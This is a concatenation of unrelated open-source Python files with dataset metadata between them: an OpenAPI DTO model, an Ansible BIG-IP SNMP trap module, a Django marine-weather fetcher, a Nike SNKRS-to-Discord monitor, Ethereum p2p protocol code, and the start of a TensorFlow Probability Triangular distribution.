Sets the state of this ListingRequestDTO.
The current state of the listing request.
:param state: The state of this ListingRequestDTO.
:type: str
"""
self._state = state
@property
def queue_size(self):
"""
Gets the queue_size of this ListingRequestDTO.
The size of the queue
:return: The queue_size of this ListingRequestDTO.
:rtype: QueueSizeDTO
"""
return self._queue_size
@queue_size.setter
def queue_size(self, queue_size):
"""
Sets the queue_size of this ListingRequestDTO.
The size of the queue
:param queue_size: The queue_size of this ListingRequestDTO.
:type: QueueSizeDTO
"""
self._queue_size = queue_size
@property
def flow_file_summaries(self):
"""
Gets the flow_file_summaries of this ListingRequestDTO.
The FlowFile summaries. The summaries will be populated once the request has completed.
:return: The flow_file_summaries of this ListingRequestDTO.
:rtype: list[FlowFileSummaryDTO]
"""
return self._flow_file_summaries
@flow_file_summaries.setter
def flow_file_summaries(self, flow_file_summaries):
"""
Sets the flow_file_summaries of this ListingRequestDTO.
The FlowFile summaries. The summaries will be populated once the request has completed.
:param flow_file_summaries: The flow_file_summaries of this ListingRequestDTO.
:type: list[FlowFileSummaryDTO]
"""
self._flow_file_summaries = flow_file_summaries
@property
def source_running(self):
"""
Gets the source_running of this ListingRequestDTO.
Whether the source of the connection is running
:return: The source_running of this ListingRequestDTO.
:rtype: bool
"""
return self._source_running
@source_running.setter
def source_running(self, source_running):
"""
Sets the source_running of this ListingRequestDTO.
Whether the source of the connection is running
:param source_running: The source_running of this ListingRequestDTO.
:type: bool
"""
self._source_running = source_running
@property
def destination_running(self):
"""
Gets the destination_running of this ListingRequestDTO.
Whether the destination of the connection is running
:return: The destination_running of this ListingRequestDTO.
:rtype: bool
"""
return self._destination_running
@destination_running.setter
def destination_running(self, destination_running):
"""
Sets the destination_running of this ListingRequestDTO.
Whether the destination of the connection is running
:param destination_running: The destination_running of this ListingRequestDTO.
:type: bool
"""
self._destination_running = destination_running
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, ListingRequestDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 29.478355
| 479
| 0.60981
|
2fda7b697c034e5bf265008c8a9f966adc351bc3
| 17,595
|
py
|
Python
|
library/library/modules/bigip_snmp_trap.py
|
meverett1167/Ansible_Demos
|
dad515d43af19bcb201f31929e03352d09097efc
|
[
"Apache-2.0"
] | null | null | null |
library/library/modules/bigip_snmp_trap.py
|
meverett1167/Ansible_Demos
|
dad515d43af19bcb201f31929e03352d09097efc
|
[
"Apache-2.0"
] | null | null | null |
library/library/modules/bigip_snmp_trap.py
|
meverett1167/Ansible_Demos
|
dad515d43af19bcb201f31929e03352d09097efc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
module: bigip_snmp_trap
short_description: Manipulate SNMP trap information on a BIG-IP
description:
- Manipulate SNMP trap information on a BIG-IP.
version_added: 2.4
options:
name:
description:
- Name of the SNMP configuration endpoint.
required: True
snmp_version:
description:
- Specifies to which Simple Network Management Protocol (SNMP) version
the trap destination applies.
choices: ['1', '2c']
community:
description:
- Specifies the community name for the trap destination.
destination:
description:
- Specifies the address for the trap destination. This can be either an
IP address or a hostname.
port:
description:
- Specifies the port for the trap destination.
network:
description:
- Specifies the name of the trap network. This option is not supported in
versions of BIG-IP < 12.1.0. If used on versions < 12.1.0, it will simply
be ignored.
- The value C(default) was removed in BIG-IP version 13.1.0. Specifying this
value when configuring a BIG-IP will cause the module to stop and report
an error. The usual remedy is to choose one of the other options, such as
C(management).
choices:
- other
- management
- default
state:
description:
- When C(present), ensures that the resource exists.
- When C(absent), ensures that the resource does not exist.
default: present
choices:
- present
- absent
partition:
description:
- Device partition to manage resources on.
default: Common
version_added: 2.5
notes:
- This module only supports version v1 and v2c of SNMP.
- The C(network) option is not supported on versions of BIG-IP < 12.1.0 because
the platform did not support that option until 12.1.0. If used on versions
< 12.1.0, it will simply be ignored.
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = r'''
- name: Create snmp v1 trap
bigip_snmp_trap:
community: general
destination: 1.2.3.4
name: my-trap1
network: management
port: 9000
snmp_version: 1
server: lb.mydomain.com
user: admin
password: secret
delegate_to: localhost
- name: Create snmp v2 trap
bigip_snmp_trap:
community: general
destination: 5.6.7.8
name: my-trap2
network: default
port: 7000
snmp_version: 2c
server: lb.mydomain.com
user: admin
password: secret
delegate_to: localhost
'''
RETURN = r'''
snmp_version:
description: The new C(snmp_version) configured on the remote device.
returned: changed and success
type: string
sample: 2c
community:
description: The new C(community) name for the trap destination.
returned: changed and success
type: list
sample: secret
destination:
description: The new address for the trap destination in either IP or hostname form.
returned: changed and success
type: string
sample: 1.2.3.4
port:
description: The new C(port) of the trap destination.
returned: changed and success
type: string
sample: 900
network:
description: The new name of the network the SNMP trap is on.
returned: changed and success
type: string
sample: management
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from distutils.version import LooseVersion
try:
from library.module_utils.network.f5.bigip import HAS_F5SDK
from library.module_utils.network.f5.bigip import F5Client
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import f5_argument_spec
try:
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
except ImportError:
from ansible.module_utils.network.f5.bigip import HAS_F5SDK
from ansible.module_utils.network.f5.bigip import F5Client
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import f5_argument_spec
try:
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
class Parameters(AnsibleF5Parameters):
api_map = {
'version': 'snmp_version',
'community': 'community',
'host': 'destination'
}
@property
def snmp_version(self):
if self._values['snmp_version'] is None:
return None
return str(self._values['snmp_version'])
@property
def port(self):
if self._values['port'] is None:
return None
return int(self._values['port'])
def to_return(self):
result = {}
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
return result
class V3Parameters(Parameters):
updatables = [
'snmp_version', 'community', 'destination', 'port', 'network'
]
returnables = [
'snmp_version', 'community', 'destination', 'port', 'network'
]
api_attributes = [
'version', 'community', 'host', 'port', 'network'
]
@property
def network(self):
if self._values['network'] is None:
return None
network = str(self._values['network'])
if network == 'management':
return 'mgmt'
elif network == 'default':
raise F5ModuleError(
"'default' is not a valid option for this version of BIG-IP. "
"Use either 'management', 'or 'other' instead."
)
else:
return network
class V2Parameters(Parameters):
updatables = [
'snmp_version', 'community', 'destination', 'port', 'network'
]
returnables = [
'snmp_version', 'community', 'destination', 'port', 'network'
]
api_attributes = [
'version', 'community', 'host', 'port', 'network'
]
@property
def network(self):
if self._values['network'] is None:
return None
network = str(self._values['network'])
if network == 'management':
return 'mgmt'
elif network == 'default':
return ''
else:
return network
class V1Parameters(Parameters):
updatables = [
'snmp_version', 'community', 'destination', 'port'
]
returnables = [
'snmp_version', 'community', 'destination', 'port'
]
api_attributes = [
'version', 'community', 'host', 'port'
]
@property
def network(self):
return None
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.kwargs = kwargs
def exec_module(self):
if self.is_version_without_network():
manager = V1Manager(**self.kwargs)
elif self.is_version_with_default_network():
manager = V2Manager(**self.kwargs)
else:
manager = V3Manager(**self.kwargs)
return manager.exec_module()
def is_version_without_network(self):
"""Is current BIG-IP version missing "network" value support
Returns:
bool: True when it is missing. False otherwise.
"""
version = self.client.api.tmos_version
if LooseVersion(version) < LooseVersion('12.1.0'):
return True
else:
return False
def is_version_with_default_network(self):
"""Is current BIG-IP version missing "default" network value support
Returns:
bool: True when it is missing. False otherwise.
"""
version = self.client.api.tmos_version
if LooseVersion(version) < LooseVersion('13.1.0'):
return True
else:
return False
class BaseManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.have = None
def exec_module(self):
changed = False
result = dict()
state = self.want.state
try:
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
except iControlUnexpectedHTTPError as e:
raise F5ModuleError(str(e))
changes = self.changes.to_return()
result.update(**changes)
result.update(dict(changed=changed))
return result
def exists(self):
result = self.client.api.tm.sys.snmp.traps_s.trap.exists(
name=self.want.name,
partition=self.want.partition
)
return result
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def create(self):
self._set_changed_options()
if self.module.check_mode:
return True
if all(getattr(self.want, v) is None for v in self.required_resources):
raise F5ModuleError(
"You must specify at least one of "
', '.join(self.required_resources)
)
self.create_on_device()
return True
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def update_on_device(self):
params = self.want.api_params()
result = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
result.modify(**params)
def create_on_device(self):
params = self.want.api_params()
self.client.api.tm.sys.snmp.traps_s.trap.create(
name=self.want.name,
partition=self.want.partition,
**params
)
def absent(self):
if self.exists():
return self.remove()
return False
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the snmp trap")
return True
def remove_from_device(self):
result = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
if result:
result.delete()
class V3Manager(BaseManager):
def __init__(self, *args, **kwargs):
super(V3Manager, self).__init__(**kwargs)
self.required_resources = [
'version', 'community', 'destination', 'port', 'network'
]
self.want = V3Parameters(params=self.module.params)
self.changes = V3Parameters()
def _set_changed_options(self):
changed = {}
for key in V3Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = V3Parameters(params=changed)
def _update_changed_options(self):
changed = {}
for key in V3Parameters.updatables:
if getattr(self.want, key) is not None:
attr1 = getattr(self.want, key)
attr2 = getattr(self.have, key)
if attr1 != attr2:
changed[key] = attr1
if changed:
self.changes = V3Parameters(params=changed)
return True
return False
def read_current_from_device(self):
resource = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
result = resource.attrs
return V3Parameters(params=result)
class V2Manager(BaseManager):
def __init__(self, *args, **kwargs):
super(V2Manager, self).__init__(**kwargs)
self.required_resources = [
'version', 'community', 'destination', 'port', 'network'
]
self.want = V2Parameters(params=self.module.params)
self.changes = V2Parameters()
def _set_changed_options(self):
changed = {}
for key in V2Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = V2Parameters(params=changed)
def _update_changed_options(self):
changed = {}
for key in V2Parameters.updatables:
if getattr(self.want, key) is not None:
attr1 = getattr(self.want, key)
attr2 = getattr(self.have, key)
if attr1 != attr2:
changed[key] = attr1
if changed:
self.changes = V2Parameters(params=changed)
return True
return False
def read_current_from_device(self):
resource = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
result = resource.attrs
self._ensure_network(result)
return V2Parameters(params=result)
def _ensure_network(self, result):
# BIG-IP's value for "default" is that the key does not
# exist. This conflicts with our purpose of having a key
# not exist (which we equate to "i dont want to change that"
# therefore, if we load the information from BIG-IP and
# find that there is no 'network' key, that is BIG-IP's
# way of saying that the network value is "default"
if 'network' not in result:
result['network'] = 'default'
class V1Manager(BaseManager):
def __init__(self, *args, **kwargs):
super(V1Manager, self).__init__(**kwargs)
self.required_resources = [
'version', 'community', 'destination', 'port'
]
self.want = V1Parameters(params=self.module.params)
self.changes = V1Parameters()
def _set_changed_options(self):
changed = {}
for key in V1Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = V1Parameters(params=changed)
def _update_changed_options(self):
changed = {}
for key in V1Parameters.updatables:
if getattr(self.want, key) is not None:
attr1 = getattr(self.want, key)
attr2 = getattr(self.have, key)
if attr1 != attr2:
changed[key] = attr1
if changed:
self.changes = V1Parameters(params=changed)
return True
return False
def read_current_from_device(self):
resource = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
result = resource.attrs
return V1Parameters(params=result)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(
required=True
),
snmp_version=dict(
choices=['1', '2c']
),
community=dict(no_log=True),
destination=dict(),
port=dict(),
network=dict(
choices=['other', 'management', 'default']
),
state=dict(
default='present',
choices=['absent', 'present']
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
if not HAS_F5SDK:
module.fail_json(msg="The python f5-sdk module is required")
try:
client = F5Client(**module.params)
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
module.exit_json(**results)
except F5ModuleError as ex:
cleanup_tokens(client)
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
| 30.076923
| 91
| 0.611822
|
e24bac7ea1f67cbed8321d83e01c8d2a15bef7b2
| 1,854
|
py
|
Python
|
homedisplay/info_weather/management/commands/fetch_marine_weather.py
|
ojarva/home-info-display
|
873d022308732baff94d0dc2381cf9dc7dce23b7
|
[
"BSD-3-Clause"
] | 1
|
2016-11-28T04:35:06.000Z
|
2016-11-28T04:35:06.000Z
|
homedisplay/info_weather/management/commands/fetch_marine_weather.py
|
ojarva/home-info-display
|
873d022308732baff94d0dc2381cf9dc7dce23b7
|
[
"BSD-3-Clause"
] | 160
|
2015-01-01T20:59:29.000Z
|
2016-04-25T13:36:52.000Z
|
homedisplay/info_weather/management/commands/fetch_marine_weather.py
|
ojarva/home-info-display
|
873d022308732baff94d0dc2381cf9dc7dce23b7
|
[
"BSD-3-Clause"
] | 1
|
2015-02-25T21:24:01.000Z
|
2015-02-25T21:24:01.000Z
|
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from homedisplay.utils import publish_ws
from info_weather.models import MarineDataPoint
import aaltopoiju
import datetime
import json
import requests
class Command(BaseCommand):
args = ''
help = 'Fetches marine weather information'
def handle(self, *args, **options):
ap = aaltopoiju.Aaltopoiju()
data = ap.fetch()
for location in data:
for observation in data[location]["observations"]:
timestamp = timezone.make_aware(
observation["timestamp"], timezone.get_current_timezone())
values = observation
del values["timestamp"]
values["forecast"] = False
datapoint, created = MarineDataPoint.objects.get_or_create(
location=location, timestamp=timestamp, defaults=values)
if not created:
for attr, value in values.iteritems():
setattr(datapoint, attr, value)
datapoint.save()
for forecast in data[location]["forecasts"]:
timestamp = timezone.make_aware(
forecast["timestamp"], timezone.get_current_timezone())
values = forecast
del values["timestamp"]
values["forecast"] = True
datapoint, created = MarineDataPoint.objects.get_or_create(
location=location, timestamp=timestamp, defaults=values)
if not created:
for attr, value in values.iteritems():
setattr(datapoint, attr, value)
datapoint.save()
| 34.981132
| 78
| 0.593312
|
457f8cddc4f054cc99674b90995292fde07387a9
| 3,142
|
py
|
Python
|
main.py
|
GuoooooJing/snkrs_monitor
|
6bcfbe78589f6817125fae617800c95b6e5ddbc0
|
[
"MIT"
] | 2
|
2020-07-25T13:28:25.000Z
|
2020-11-01T15:13:45.000Z
|
main.py
|
GuoooooJing/snkrs_monitor
|
6bcfbe78589f6817125fae617800c95b6e5ddbc0
|
[
"MIT"
] | null | null | null |
main.py
|
GuoooooJing/snkrs_monitor
|
6bcfbe78589f6817125fae617800c95b6e5ddbc0
|
[
"MIT"
] | null | null | null |
import time
import requests
from discord_webhook import DiscordWebhook, DiscordEmbed
url = 'https://api.nike.com/snkrs/content/v1/?country=US&language=en&offset=0&orderBy=published'
webhook_url = 'your discord webhook url'
def check_update(data, previous):
new_dict = {}
extra_dict = {}
new = set()
for i in data:
new.add(i['id'])
if i['id'] in previous:
continue
elif i['interestId']:
info = {}
info['type'] = i['product']['productType']
info['name'] = i['name']
info['color'] = i['product']['colorDescription']
info['price'] = i['product']['price']['msrp']
info['image'] = i['imageUrl']
info['date'] = i['product']['startSellDate']
info['publishType'] = i['product']['publishType']
new_dict[i['id']] = info
else:
info = {}
info['name'] = i['name']
info['image'] = i['imageUrl']
info['date'] = i['publishedDate']
info['desc'] = '\n'.join(i['tags'])
extra_dict[i['id']] = info
return new_dict, extra_dict, new
def update_discord(new, extra, webhook_url):
webhook = DiscordWebhook(url=webhook_url)
for i in new:
embed = DiscordEmbed(title='{}({})'.format(new[i]['name'], new[i]['color']), description='id: {}'.format(i),
color=7395813, timestamp=new[i]['date'])
embed.set_thumbnail(url=new[i]['image'])
embed.set_footer(text="Lacuh time", icon_url="https://cdn.discordapp.com/embed/avatars/0.png")
embed.set_image(url=new[i]['image'])
embed.add_embed_field(name="Lauch Method", value="{}".format(new[i]['publishType']))
embed.add_embed_field(name="Price", value="${}\n".format(new[i]['price']))
embed.add_embed_field(name='Product Type', value=new[i]['type'])
webhook.add_embed(embed)
webhook.execute()
webhook.remove_embed(0)
time.sleep(3)
for i in extra:
embed = DiscordEmbed(title=extra[i]['name'], description='id: {}'.format(i),
color=7395813, timestamp=extra[i]['date'])
embed.set_image(url=extra[i]['image'])
embed.set_footer(text='Published time', icon_url="https://cdn.discordapp.com/embed/avatars/0.png")
embed.set_thumbnail(url=extra[i]['image'])
embed.add_embed_field(name='detail', value=extra[i]['desc'])
webhook.add_embed(embed)
webhook.execute()
webhook.remove_embed(0)
time.sleep(3)
if __name__ == '__main__':
previous = {}
count = 0
while True:
count += 1
count %= 100000
print(count)
jfile = requests.get(url).json()
if 'threads' not in jfile:
print(jfile)
print('skip')
continue
data = jfile['threads']
time.sleep(2)
dic, extra, previous = check_update(data, previous)
update_discord(dic, extra, webhook_url)
print(len(dic))
| 36.534884
| 117
| 0.549332
|
0dff79d11cd3040c89fb9b5d38eb034253346d32
| 9,336
|
py
|
Python
|
p2p/protocol.py
|
Gauddel/trinity
|
0b12943ac36f4090abc22fc965e9e9a4f42c6f35
|
[
"MIT"
] | null | null | null |
p2p/protocol.py
|
Gauddel/trinity
|
0b12943ac36f4090abc22fc965e9e9a4f42c6f35
|
[
"MIT"
] | null | null | null |
p2p/protocol.py
|
Gauddel/trinity
|
0b12943ac36f4090abc22fc965e9e9a4f42c6f35
|
[
"MIT"
] | null | null | null |
from abc import ABC
import logging
import operator
import struct
from typing import (
Any,
ClassVar,
Dict,
Generic,
Iterable,
List,
Sequence,
Tuple,
Type,
TypeVar,
Union,
)
from mypy_extensions import (
TypedDict,
)
import snappy
from eth_utils import to_tuple
from eth_utils.toolz import groupby
import rlp
from rlp import sedes
from eth.constants import NULL_BYTE
from p2p._utils import get_devp2p_cmd_id
from p2p.exceptions import (
MalformedMessage,
)
from p2p.transport import Transport
class TypedDictPayload(TypedDict):
pass
PayloadType = Union[
Dict[str, Any],
List[rlp.Serializable],
Tuple[rlp.Serializable, ...],
TypedDictPayload,
]
# A payload to be delivered with a request
TRequestPayload = TypeVar('TRequestPayload', bound=PayloadType, covariant=True)
# for backwards compatibility for internal references in p2p:
_DecodedMsgType = PayloadType
StructureType = Union[
Tuple[Tuple[str, Any], ...],
]
class Command:
_cmd_id: int = None
decode_strict = True
structure: StructureType
_logger: logging.Logger = None
def __init__(self, cmd_id_offset: int, snappy_support: bool) -> None:
self.cmd_id_offset = cmd_id_offset
self.cmd_id = cmd_id_offset + self._cmd_id
self.snappy_support = snappy_support
@property
def logger(self) -> logging.Logger:
if self._logger is None:
self._logger = logging.getLogger(f"p2p.protocol.{type(self).__name__}")
return self._logger
@property
def is_base_protocol(self) -> bool:
return self.cmd_id_offset == 0
def __str__(self) -> str:
return f"{type(self).__name__} (cmd_id={self.cmd_id})"
def encode_payload(self, data: Union[PayloadType, sedes.CountableList]) -> bytes:
if isinstance(data, dict):
if not isinstance(self.structure, tuple):
raise ValueError(
"Command.structure must be a list when data is a dict. Got "
f"{self.structure}"
)
expected_keys = sorted(name for name, _ in self.structure)
data_keys = sorted(data.keys())
if data_keys != expected_keys:
raise ValueError(
f"Keys in data dict ({data_keys}) do not match expected keys ({expected_keys})"
)
data = tuple(data[name] for name, _ in self.structure)
if isinstance(self.structure, sedes.CountableList):
encoder = self.structure
else:
encoder = sedes.List([type_ for _, type_ in self.structure])
return rlp.encode(data, sedes=encoder)
def decode_payload(self, rlp_data: bytes) -> PayloadType:
if isinstance(self.structure, sedes.CountableList):
decoder = self.structure
else:
decoder = sedes.List(
[type_ for _, type_ in self.structure], strict=self.decode_strict)
try:
data = rlp.decode(rlp_data, sedes=decoder, recursive_cache=True)
except rlp.DecodingError as err:
raise MalformedMessage(f"Malformed {type(self).__name__} message: {err!r}") from err
if isinstance(self.structure, sedes.CountableList):
return data
return {
field_name: value
for ((field_name, _), value)
in zip(self.structure, data)
}
def decode(self, data: bytes) -> PayloadType:
packet_type = get_devp2p_cmd_id(data)
if packet_type != self.cmd_id:
raise MalformedMessage(f"Wrong packet type: {packet_type}, expected {self.cmd_id}")
compressed_payload = data[1:]
encoded_payload = self.decompress_payload(compressed_payload)
return self.decode_payload(encoded_payload)
def decompress_payload(self, raw_payload: bytes) -> bytes:
# Do the Snappy Decompression only if Snappy Compression is supported by the protocol
if self.snappy_support:
try:
return snappy.decompress(raw_payload)
except Exception as err:
# log this just in case it's a library error of some kind on valid messages.
self.logger.debug("Snappy decompression error on payload: %s", raw_payload.hex())
raise MalformedMessage from err
else:
return raw_payload
def compress_payload(self, raw_payload: bytes) -> bytes:
# Do the Snappy Compression only if Snappy Compression is supported by the protocol
if self.snappy_support:
return snappy.compress(raw_payload)
else:
return raw_payload
def encode(self, data: PayloadType) -> Tuple[bytes, bytes]:
encoded_payload = self.encode_payload(data)
compressed_payload = self.compress_payload(encoded_payload)
enc_cmd_id = rlp.encode(self.cmd_id, sedes=rlp.sedes.big_endian_int)
frame_size = len(enc_cmd_id) + len(compressed_payload)
if frame_size.bit_length() > 24:
raise ValueError("Frame size has to fit in a 3-byte integer")
# Drop the first byte as, per the spec, frame_size must be a 3-byte int.
header = struct.pack('>I', frame_size)[1:]
# All clients seem to ignore frame header data, so we do the same, although I'm not sure
# why geth uses the following value:
# https://github.com/ethereum/go-ethereum/blob/master/p2p/rlpx.go#L556
zero_header = b'\xc2\x80\x80'
header += zero_header
header = _pad_to_16_byte_boundary(header)
body = _pad_to_16_byte_boundary(enc_cmd_id + compressed_payload)
return header, body
class BaseRequest(ABC, Generic[TRequestPayload]):
"""
Must define command_payload during init. This is the data that will
be sent to the peer with the request command.
"""
# Defined at init time, with specific parameters:
command_payload: TRequestPayload
# Defined as class attributes in subclasses
# outbound command type
cmd_type: Type[Command]
# response command type
response_type: Type[Command]
CapabilityType = Tuple[str, int]
class Protocol(ABC):
transport: Transport
name: ClassVar[str]
version: ClassVar[int]
cmd_length: int = None
# Command classes that this protocol supports.
_commands: Tuple[Type[Command], ...]
_logger: logging.Logger = None
def __init__(self, transport: Transport, cmd_id_offset: int, snappy_support: bool) -> None:
self.transport = transport
self.cmd_id_offset = cmd_id_offset
self.snappy_support = snappy_support
self.commands = [cmd_class(cmd_id_offset, snappy_support) for cmd_class in self._commands]
self.cmd_by_type = {type(cmd): cmd for cmd in self.commands}
self.cmd_by_id = {cmd.cmd_id: cmd for cmd in self.commands}
@property
def logger(self) -> logging.Logger:
if self._logger is None:
self._logger = logging.getLogger(f"p2p.protocol.{type(self).__name__}")
return self._logger
def send_request(self, request: BaseRequest[PayloadType]) -> None:
command = self.cmd_by_type[request.cmd_type]
header, body = command.encode(request.command_payload)
self.transport.send(header, body)
def supports_command(self, cmd_type: Type[Command]) -> bool:
return cmd_type in self.cmd_by_type
@classmethod
def as_capability(cls) -> CapabilityType:
return (cls.name, cls.version)
def __repr__(self) -> str:
return "(%s, %d)" % (self.name, self.version)
CapabilitiesType = Tuple[CapabilityType, ...]
@to_tuple
def match_protocols_with_capabilities(protocols: Sequence[Type[Protocol]],
capabilities: CapabilitiesType) -> Iterable[Type[Protocol]]:
"""
Return the `Protocol` classes that match with the provided `capabilities`
according to the RLPx protocol rules.
- ordered case-sensitive by protocol name
- at most one protocol per name
- discard protocols that are not present in `capabilities`
- use highest version in case of multiple same-name matched protocols
"""
# make a set for faster inclusion checks
capabilities_set = set(capabilities)
# group the protocols by name
proto_groups = groupby(operator.attrgetter('name'), protocols)
for _, homogenous_protocols in sorted(proto_groups.items()):
# for each set of protocols with the same name, sort them in decreasing
# order by their version number.
ordered_protocols = sorted(
homogenous_protocols,
key=operator.attrgetter('version'),
reverse=True,
)
for proto in ordered_protocols:
if proto.as_capability() in capabilities_set:
# select the first protocol we find that is in the provided
# `capabilities` which will be the *highest* version since we
# previously sorted them.
yield proto
break
def _pad_to_16_byte_boundary(data: bytes) -> bytes:
"""Pad the given data with NULL_BYTE up to the next 16-byte boundary."""
remainder = len(data) % 16
if remainder != 0:
data += NULL_BYTE * (16 - remainder)
return data
| 33.342857
| 99
| 0.654135
|
7ee81203286206d50cc2a210f1841b0a36935905
| 11,373
|
py
|
Python
|
tensorflow_probability/python/distributions/triangular.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/distributions/triangular.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/distributions/triangular.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""The Triangular distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.bijectors import sigmoid as sigmoid_bijector
from tensorflow_probability.python.distributions import distribution
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import parameter_properties
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import reparameterization
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensor_util
class Triangular(distribution.Distribution):
r"""Triangular distribution with `low`, `high` and `peak` parameters.
#### Mathematical Details
The Triangular distribution is specified by two line segments in the plane,
such that:
* The first line segment starts at `(a, 0)` and ends at `(c, z)`.
* The second line segment starts at `(c, z)` and ends at `(b, 0)`.
```none
y
^
z | o (c,z)
| / \
| / \
| / \
| (a,0) / \ (b,0)
0 +------o---------o-------> x
0 a c b
```
where:
* a <= c <= b, a < b
* `low = a`,
* `high = b`,
* `peak = c`,
* `z = 2 / (b - a)`
The parameters `low`, `high` and `peak` must be shaped in a way that supports
broadcasting (e.g., `high - low` is a valid operation).
#### Examples
```python
import tensorflow_probability as tfp
tfd = tfp.distributions
# Specify a single Triangular distribution.
u1 = tfd.Triangular(low=3., high=4., peak=3.5)
u1.mean()
# ==> 3.5
# Specify two different Triangular distributions.
u2 = tfd.Triangular(low=[1., 2.], high=[3., 4.], peak=[2., 3.])
u2.mean()
# ==> [2., 3.]
# Specify three different Triangular distributions by leveraging broadcasting.
u3 = tfd.Triangular(low=3., high=[5., 6., 7.], peak=3.)
u3.mean()
# ==> [3.6666, 4., 4.3333]
```
"""
def __init__(self,
low=0.,
high=1.,
peak=0.5,
validate_args=False,
allow_nan_stats=True,
name='Triangular'):
"""Initialize a batch of Triangular distributions.
Args:
low: Floating point tensor, lower boundary of the output interval. Must
have `low < high`.
Default value: `0`.
high: Floating point tensor, upper boundary of the output interval. Must
have `low < high`.
Default value: `1`.
peak: Floating point tensor, mode of the output interval. Must have
`low <= peak` and `peak <= high`.
Default value: `0.5`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
Default value: `False`.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
